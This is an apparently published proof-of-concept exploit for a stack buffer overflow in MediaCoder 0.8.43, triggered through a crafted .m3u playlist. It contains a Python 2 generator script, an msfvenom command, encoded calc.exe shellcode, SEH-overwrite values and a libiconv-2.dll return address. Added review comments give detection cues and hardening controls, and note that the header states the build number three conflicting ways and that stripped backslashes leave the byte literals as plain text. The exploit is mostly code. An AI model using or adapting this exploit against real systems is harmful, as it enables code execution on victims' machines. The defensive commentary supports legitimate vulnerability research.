
MediaCoder 0.8.43.5852 SEH Overflow

Posted on 26 July 2016

# Exploit Title: [MediaCoder 0.8.43.5852 - .m3u SEH Exploit]
# Exploit Author: [Karn Ganeshen]
# Vendor Homepage: [http://www.mediacoderhq.com]
# Download link: [http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.45.5852.exe]
# Version: [Current version 0.8.43.58.52]
# Tested on: [Windows Vista SP2]
#
# NOTE(review): the build number is written three ways in this header
# (0.8.43.5852, 0.8.45.5852 in the download link, 0.8.43.58.52); confirm the
# affected build against the vendor's release notes before scoping exposure.
#
#!/usr/bin/python
#
# Purpose: proof-of-concept generator. It writes one file, evil.m3u, holding a
# single over-long playlist entry that begins with "http:// ". Per the title,
# parsing that entry in the affected MediaCoder build overflows a stack buffer
# far enough to overwrite a structured-exception-handler (SEH) record.
#
# NOTE(review): as rendered on this page every escape sequence has lost its
# backslash, so the literals below are plain ASCII text ("x89xe1...") rather
# than raw bytes. Do not lift them as byte patterns for signatures.
#
# Triage cues visible in the layout built below: one .m3u line, no line break,
# several thousand bytes long, with long runs of a single repeated value. A
# playlist entry of that shape is worth flagging regardless of the payload.
#
# Hardening this technique depends on being absent (presumably; verify for the
# deployed build): the handler address is taken from a bundled module,
# libiconv-2.dll, at a fixed location, which normally means that module is
# built without SafeSEH and is not relocated by ASLR. System-wide SEHOP and a
# rebuilt or updated DLL are the relevant controls.

total_buf = 5000  # assigned but never read; the size comes from the pieces below

# Author's generation command and reported size for the payload. The payload
# named here is the benign demonstration windows/exec CMD=calc.exe; the encoder
# and the excluded-byte list (-b) reflect bytes the playlist parser does not
# pass through intact.
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/alpha_upper -b 'x00x0ax0dxff' -f c
# Payload size: 455 bytes
shellcode = ("x89xe1xdaxccxd9x71xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4dx38x4cx42x55x50"
"x45x50x35x50x53x50x4cx49x4bx55x46x51x59x50x55"
"x34x4cx4bx30x50x56x50x4cx4bx31x42x54x4cx4cx4b"
"x46x32x44x54x4cx4bx32x52x47x58x34x4fx58x37x50"
"x4ax47x56x50x31x4bx4fx4ex4cx37x4cx43x51x53x4c"
"x53x32x36x4cx51x30x59x51x58x4fx34x4dx35x51x48"
"x47x4ax42x5ax52x36x32x46x37x4cx4bx56x32x52x30"
"x4cx4bx50x4ax57x4cx4cx4bx50x4cx52x31x32x58x4d"
"x33x30x48x33x31x38x51x46x31x4cx4bx50x59x31x30"
"x33x31x49x43x4cx4bx30x49x55x48x5ax43x36x5ax47"
"x39x4cx4bx30x34x4cx4bx45x51x39x46x36x51x4bx4f"
"x4ex4cx59x51x48x4fx44x4dx53x31x58x47x56x58x4d"
"x30x33x45x4bx46x54x43x43x4dx4cx38x47x4bx53x4d"
"x37x54x54x35x5ax44x51x48x4cx4bx30x58x57x54x35"
"x51x4ex33x55x36x4cx4bx54x4cx30x4bx4cx4bx56x38"
"x45x4cx43x31x58x53x4cx4bx55x54x4cx4bx35x51x48"
"x50x4bx39x51x54x56x44x46x44x51x4bx31x4bx43x51"
"x46x39x30x5ax46x31x4bx4fx4dx30x51x4fx51x4fx31"
"x4ax4cx4bx52x32x4ax4bx4cx4dx51x4dx52x4ax43x31"
"x4cx4dx4cx45x4fx42x43x30x55x50x33x30x30x50x33"
"x58x56x51x4cx4bx32x4fx4dx57x4bx4fx48x55x4fx4b"
"x4ax50x38x35x4ex42x31x46x53x58x49x36x5ax35x4f"
"x4dx4dx4dx4bx4fx4ex35x47x4cx43x36x33x4cx35x5a"
"x4bx30x4bx4bx4dx30x44x35x33x35x4fx4bx31x57x44"
"x53x52x52x52x4fx33x5ax33x30x36x33x4bx4fx58x55"
"x42x43x45x31x52x4cx35x33x56x4ex55x35x54x38x32"
"x45x53x30x41x41")

# The entry starts with a URL-style prefix, then 784 filler characters.
# presumably 784 is the offset to the exception record measured on the
# author's test system (Windows Vista SP2); it may differ on other builds.
junk = "http:// "
junk += "A"*784

# The two fields of the overwritten exception record, in the order they are
# concatenated into the file: next-record field first, handler field second.
nseh = "xEBx06x90x90"
seh = "x38x78x01x66" # PPR - 0x66017838 - libiconv-2.dll

# Final layout: prefix + filler, the record, 50 pad values, the payload, then
# 3000 trailing pad values.
evil = junk + nseh + seh
evil += "x90"*50 + shellcode
evil += "x90"*3000

# Writes the entry to evil.m3u in the current working directory.
# NOTE(review): a str is written to a file opened in binary mode, so this is
# presumably Python 2 code; the name `file` also shadows the Python 2 builtin.
file = open("evil.m3u", "wb")
file.write (evil)
file.close()

 
